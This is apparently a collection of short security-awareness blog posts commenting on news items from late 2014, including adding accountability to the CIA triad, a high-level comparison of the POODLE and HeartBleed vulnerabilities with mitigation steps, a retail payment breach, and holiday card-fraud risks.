One this last day of Cyber Security Awareness Month, I thought this was an excellent article outlining two core principles in keeping our PII safe from bad guys: strong authentication and user awareness.
A good friend and colleague Michael Burgess, CISSP, sent me the following message this morning:
“I’ve been doing some research and thought you may benefit from (if you haven’t already ran across it). Some have begin adding an addition to a well known acronym and a core principle in information security. I think it is picking up steam and with good reason.
Accountability as in the process of tracing, or being able to trace activities to a responsible source….I think it is a good addition given experiences and how often accountability is needed, or would have been helpful.”
I think Mr. Burgess and the growing movement to expand the traditional triad are spot on. Accountability is an important principle in IT Security and is closely tied to the principles of data integrity, confidentiality and availability. It speaks to the responsibilities of data stewards and data owners and the need for security analysts to capture activities and report on anomalous behavior.
Kudos to Michael for bringing this idea forward and continuing the conversation to our profession stronger.
This type of sharing is an absolutely vital component in the war against the spread of malware and malicious code intended to compromise PII. Every industry should entertain these types of open conversations and organizations.
This is a scary proposition. If you waited more than 7 hours to patch the vulnerability reported on 10/15, you are probably compromised. This speaks to the pressing need to be diligent and actively monitor for threats via news outlets, RSS feeds and other sources.
Many of you have seen press coverage or the many online updates involving the POODLE vulnerability. After the fallout surrounding the HeartBleed vulnerability, websites and web application vendors are not taking any chances and have saturated mailboxes and web banners with alerts for their potential users. I sincerely appreciate this diligence, but it can lead to some confusion over the risks facing customers and application owners.
Let me start by saying there is a significant difference between HeartBleed and POODLE. HeartBleed is based on a flaw found in a version of OpenSSL that was extremely popular for web servers hosting some of the most frequented sites on the web including national banks and the world’s largest online retailer. HeartBleed affected millions of online customers and resulted in the loss of tens of thousands of hours in IT resources to validate and upgrade web servers around the world.
Pardon the pun, but POODLE is a completely different animal. POODLE is based on a flaw within SSLv3. SSLv3 is a block cipher dating back more than 18 years and this particular vulnerability manipulates the padding added to an encrypted block when it is too short for the algorithm. Based on its age, it is rarely used on webpages today. It has been largely replaced by one of several versions of TLS (Transport Layer Security). Consider these facts:
- SSLv3 was originally released in 1996. TLS 1.0 (Transport Layer Security) was released in 1999 as an upgrade to SSLv3. The latest released version of TLS is 1.2 which became available in August 2008.
- SSLv3 only accounts for approximately 0.3% of all HTTPS Internet connections.
- Of the Alexa Top Million Domains of the Internet, only 0.42% have some reliance on SSLv3, and that is typically tied to a subdomain.
Clearly, the threat footprint for POODLE pails in comparison to HeartBleed. That does not mean we should not take steps to alleviate the threat. Most of the websites that still leverage SSLv3 are moving away from it and toward TLS. Internet Explorer 6.o is the only major browser still in production that does not support TLS 1.0 or higher, making it the last hurdle for those still forced to utilize it. In fact, most web browsers are moving to disable support for SSLv3.
- Firefox Version 34, slated for release on November 25, will disable SSLv3 by default.
- Microsoft has announced its plan to disable support for SSLv3 in Internet Explorer and all of its online services over the next few months.
- Microsoft has also released a FixIt tool that allows users to disable SSLv3 support in any of the currently supported version of Internet Explorer.
- Google Chrome and Firefox both currently support SCSV (Signaling Cipher Suite Value) which is a TLS Fallback mechanism to prevent protocol downgrade attacks such as POODLE.
As an IT Security professional, I am always thrilled to see the world at large take threats and vulnerabilities seriously. But I do become concerned when the media overreacts to a threat or begins to paint all vulnerabilities and incidents with the same broad brush. By doing so, we either become hyper-sensitive to every threat, large or small, or we become completely desensitized to all threats, leaving us more vulnerable to criminal activity. At the end of the day, I hope we can reach a balance where each incident is dealt with appropriately and given the weight it deserves.
This breach is a bad sign for the future of MCX and CurrentC. Member retailers (Target, Walmart, Dicks, Chili’s, among many others) have already been hedging their bets in this partnership since the announcement of Apple Pay. This will give them yet another reason to reconsider their payment options and the exclusivity of a CurrentC digital wallet.
The ability to find and/or remote wipe stolen or lost smartphones has always been important, but in the age of growing mobile payments via smart devices, this feature is all the more crucial. A potential flaw in Samsung’s offering is a significant red flag, and potential boon for iPhone proponents.
I am always interested in reading the opinions of seasoned security professionals and this article is no exception. Core national infrastructure as a target for potential attack or breach should give all of us pause.
The holidays are upon us and so are the security concerns associated with all of those credit and debit card transactions. All signs point to a significant surge in malware infection and data breach activity over the next two months. This is concerning for both the retailer and the consumer.
In the attached article, one particular phrase continues to stand out in my mind – “Organizations should operate under the assumption they are in a state of continuous breach,” the report said. This is so true and so telling on many fronts. So many compromises could have been avoided or mitigated if the retailers would have approached IT security on a daily basis as if the walls were falling and the enemy was at the gate.
As consumers, each of us should be equally prepared. We should not live in fear and avoid retailers this holiday season, but we should be diligent in our buying practices. We should understand the risks and rewards of the cards we choose to use in transactions and we should consider the retailers with which we shop.
It’s about to be a very busy season indeed…
Kudos to everyone who can take advantage of this deal. I am a huge fan of free disk. That said, more and more of our lives are ending up in the cloud. Are you considering how you keep that data safe? do you trust the provider or do you take the reins or do you do a little of both?